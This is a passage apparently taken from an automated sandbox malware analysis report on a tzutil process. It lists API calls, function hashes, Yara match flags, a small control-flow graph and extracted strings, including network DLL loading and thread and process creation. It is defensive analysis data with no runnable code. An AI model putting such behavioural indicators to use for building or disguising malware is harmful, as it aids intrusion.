                                                              • Opcode Fuzzy Hash: 892999265728ba5ef09b23913f6eefb4d228172724636397d969ca05a149a1ed
                                                              • Instruction Fuzzy Hash: 6990023120188C42D110B158940474A000987D0301F5AC412A442569CD879989917135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 182b9ca1c3cdc4ab56ce6f6e3c87224842fd46a122a0d3faf5a052d440c606d5
                                                              • Instruction ID: 0ab1aa6576e49d9cd749ba256e009c62fb9453fced24829478e11e9f7ccea12a
                                                              • Opcode Fuzzy Hash: 182b9ca1c3cdc4ab56ce6f6e3c87224842fd46a122a0d3faf5a052d440c606d5
                                                              • Instruction Fuzzy Hash: 8690023120180C82D100B1585404B46000987E0301F56C017A0125698D8719C9517535
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4ea382b4c099a7355f960b6e8da0a0fb6e1951656c1a94e5a31020783fd7139e
                                                              • Instruction ID: 17026e03b16432e246c91fd7705243b5bcbdd7849bbd7f68cc92904e541959d7
                                                              • Opcode Fuzzy Hash: 4ea382b4c099a7355f960b6e8da0a0fb6e1951656c1a94e5a31020783fd7139e
                                                              • Instruction Fuzzy Hash: 5190023160590842D100B1585514706100987D0301F66C412A04255ACD87998A5165B6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 10ed370433a04703677a39e527a567ea8ef67af5c9976e1fe25e2173e8ad5419
                                                              • Instruction ID: 8d449e46cdba39f4c2891f07fa5c178fffedf26095bf212732a10599c7c4a535
                                                              • Opcode Fuzzy Hash: 10ed370433a04703677a39e527a567ea8ef67af5c9976e1fe25e2173e8ad5419
                                                              • Instruction Fuzzy Hash: 3290022124585542D150B15C54046164009A7E0301F56C022A08155D8D865989556235

                                                               Control-flow Graph (basic blocks and edges; the executed / not-executed colouring of the rendered graph is not reproduced)
                                                               • 429: 321114d-3211158 -> 430, 431
                                                               • 430: 32111d8-3211247, calls 322b890, 322c2a0, 3214990, 32013e0, 3222000 -> 445, 446
                                                               • 431: 321115a-3211166 -> 432, 433
                                                               • 432: 32111c3-32111d4
                                                               • 433: 3211168 -> 432
                                                               • 445: 3211267-321126d
                                                               • 446: 3211249-3211258, PostThreadMessageW -> 445, 447
                                                               • 447: 321125a-3211264 -> 445
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction ID: ba39e92c9191660559eefbad701f004dae31b5dcdde23189b505674515d2ecdd
                                                              • Opcode Fuzzy Hash: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction Fuzzy Hash: 77213776A1431C7EEB00EE949C82DEEBB7CEF40290B004169E904AB140D6749E6587E1

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction ID: e701433b5924eaf890357dd8385874be7dc347ba1e814a9b5e02a06da732bb2c
                                                              • Opcode Fuzzy Hash: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction Fuzzy Hash: 6511A1B691035D7AEB10EBE49CC1DEFBB7CDF41694F048158FA04BB240E6745E458BA1

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction ID: a31f7235dd7b93cdcd46f0a36e67cadb7a86ac74d6254eb124dc07f3810036c1
                                                              • Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction Fuzzy Hash: 4601C4B6D1035C7AEB10EBE09C81DEFBB7C9F41694F048058FA04BB240E6745E458BA1
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 03223EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction ID: 062026fd162a108fa5db46c96c99c23b83eb68631b44d57d19f5af436c761f92
                                                              • Opcode Fuzzy Hash: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction Fuzzy Hash: 20317EB5A01706BBD714DFA4DC80FEBBBB9EB88710F044119E61D5B240D7B4AA40CFA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction ID: 197c253a961c254f445f6f77fe58328314383a95ceb4c33479a38214042c2d6c
                                                              • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction Fuzzy Hash: B8314176A1020AAFDB10DFD8CD809EFB7B9FF88304F108559E915EB214D775AE458BA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction ID: 1e0bcfd67ef7266e155384dc4861e834eaf2dc5893c3b911932b0a2986996a51
                                                              • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction Fuzzy Hash: 77314176A1020AAFDB00DFD8CD809EFB7B9FF88304B108559E915AB214D775EE458BA0
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction ID: 0de05b9f6a1e507f1df4beff95a005aa088bf34b5965967af10961c1b7df2f00
                                                              • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction Fuzzy Hash: B521C1777102061FC311DA29D982BF9B778EB61315F1502D8E918CF280D6215A76C7D0
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214A02
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction ID: dfbeab8212b8a6e16c8ec892e91ac028f9efdb55e22ba0e5de8b21343bc54d84
                                                              • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction Fuzzy Hash: B42105376141478FCB11EE2AC5426E9FFF8EBA1714B1942D8D45CCF242D13295A68790
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214A02
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: ee2ea82d2cf7f20c445d2bef04d0d2540910091b0c3ed06f7d64281f24d4b592
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D4015EB9D5020EBBDB10EAA1DD41FDDB7B89B14308F0441A5E9089B240F671E758CB91
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,03218724,00000010,?,?,?,00000044,?,00000010,03218724,?,?,?), ref: 03229BB3
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 9f795cb4e75d49cfc3c0c86e4962799075c0889bf731b7d6ca2a6f2fda5f4dbc
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: 1C01C0B6215208BFCB04DE99DC90EEB77ADEF8C754F508208FA09E7240D630F8518BA4
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F62
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction ID: a6ff4bba62494485b046277f86c3659ef952fbfe9317d7d286d369400c3843ac
                                                              • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction Fuzzy Hash: 15F06D3739031436E320A6E99C02FDBBB9C8B85B61F140026F60DEE1C0D9D2F58586A4
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F62
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction ID: 57d99d16c0584bf7cc188f2b68b07331d6c087e90bdca41b569f715fb9060f42
                                                              • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction Fuzzy Hash: 05F02B373403103BE330A6A88C02FDFAB9C8F95B50F240119F609AF1C0C5D2B58587A4
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(03211E59,?,03225F17,03211E59,?,03225F17,?,03211E59,032259BF,00001000,?,00000000), ref: 03229AC9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: 1ce23137b20b9f624b96aaec58e1f586579b014ac4f3b1dd22a4e8c24d682105
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: C1E01A7A2143187BD714EF5ADC41F9B77ACEFC9710F004419FA48AB241DA71B9508BB8
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,03214211,000000F4), ref: 03229B09
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction ID: e4985cc38719cd95a3de60c7e1971d0aeb05a83a8c0fd22d2a2052ae1b37442d
                                                              • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction Fuzzy Hash: 6BE09A76200304BBC620EF59DC41FAB77ACEFC9B10F004418F908AB241C670F8648BB4
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0321878A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction ID: 0d6ca9f2eb92e2dfbd4c676ebe91df525ff70e7b52e2dd1b22e19d446ca2d166
                                                              • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction Fuzzy Hash: 4BE0267A6203042BFF10EAA89D81F6233884B8C730F0C0A50BA1CDB2C1D174F5928254
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,03212150,032282FF,?,0321211B), ref: 03218591
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction ID: dac39781fae2c1e4820c0a4d3c9ed9fa5bed0cec77e1936b3271881412008a97
                                                              • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction Fuzzy Hash: 60D05E767503057BFA40E6F49C83F5632CC8B14751F060064BA0CEA2C2D9A1F2508965
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f377a40cbeae339e562399862f161ee352951e26a926bdb5a9543aff838cc961
                                                              • Instruction ID: 7229305b9462215d1718c7c665d5f7b4348019c775d4b4fe70680068643fb080
                                                              • Opcode Fuzzy Hash: f377a40cbeae339e562399862f161ee352951e26a926bdb5a9543aff838cc961
                                                              • Instruction Fuzzy Hash: 4BB09B719019C5C9DB11E76056087177908A7D0741F1AC4A2D3430685E473DC1D1E275
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction ID: 43f68411ecb7f05ecc7ba1981ce609b900774ad6c0e9541d1db5a3919429839f
                                                              • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction Fuzzy Hash: F9410374608F1D4FD328FF6C90812B6B3E1FB48300F54052DEA8ACB252EA70E8468689
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction ID: 48bda0f78f5d2101d9e8f47a9eb71f261fadcef101c96b5ddfd6220457a0a374
                                                              • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction Fuzzy Hash: 96A160F04082948AC7158F58A0552AFFFB1EBC6305F15816DE7E6BB243C3BE8909CB85
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: a80408c8a9b8e95a756215f48d40d99f01c1e84c010e0a381966b7b007c556f2
                                                              • Instruction ID: 71ecb41b13c8b5da815e10ec5cb74175f163a9f12aace3df3dd79f7130d39ccf
                                                              • Opcode Fuzzy Hash: a80408c8a9b8e95a756215f48d40d99f01c1e84c010e0a381966b7b007c556f2
                                                              • Instruction Fuzzy Hash: BE51F9B9A00256BFCB10DF9C8980A7FFBBCBB48241754866AE5A5D7641D734DE408BE0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 7a88a4ef10863c26aa498ea9c82b6682dae6868ae8d31d9a96983f31837f3027
                                                              • Instruction ID: a06e3a01c36950b8ba4acad62e6747c0c71d782d85864d244378fec7bb3d9e1b
                                                              • Opcode Fuzzy Hash: 7a88a4ef10863c26aa498ea9c82b6682dae6868ae8d31d9a96983f31837f3027
                                                              • Instruction Fuzzy Hash: FB519775A00645AFDB30DF9CC990A7EBBFDEB54200B44886FE4D6D7681D778EA408760
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A24725
                                                              • Execute=1, xrefs: 03A24713
                                                              • ExecuteOptions, xrefs: 03A246A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A24655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A24742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A24787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A246FC
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 437dc4cbb756d53da5f2d418dc4a1717da9a3a40f4f93bda1c68492c36dd95bc
                                                              • Instruction ID: 614fb1409dfd9a3b0484f4785013499fef33cce893cc685636d006c10b8861fe
                                                              • Opcode Fuzzy Hash: 437dc4cbb756d53da5f2d418dc4a1717da9a3a40f4f93bda1c68492c36dd95bc
                                                              • Instruction Fuzzy Hash: D6512735A00319BEEF12EBE9DC85FAE77ACEF48704F04049AE505AB191E7719A418F52
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: be2916a679d8371b4ecd12e24217a072d4994cefa8499a42718f53ca6ab9bc21
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 9D022675508341AFD309EF18C994A6BBBF5EFC8704F148A2EFA855B264DB31E905CB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
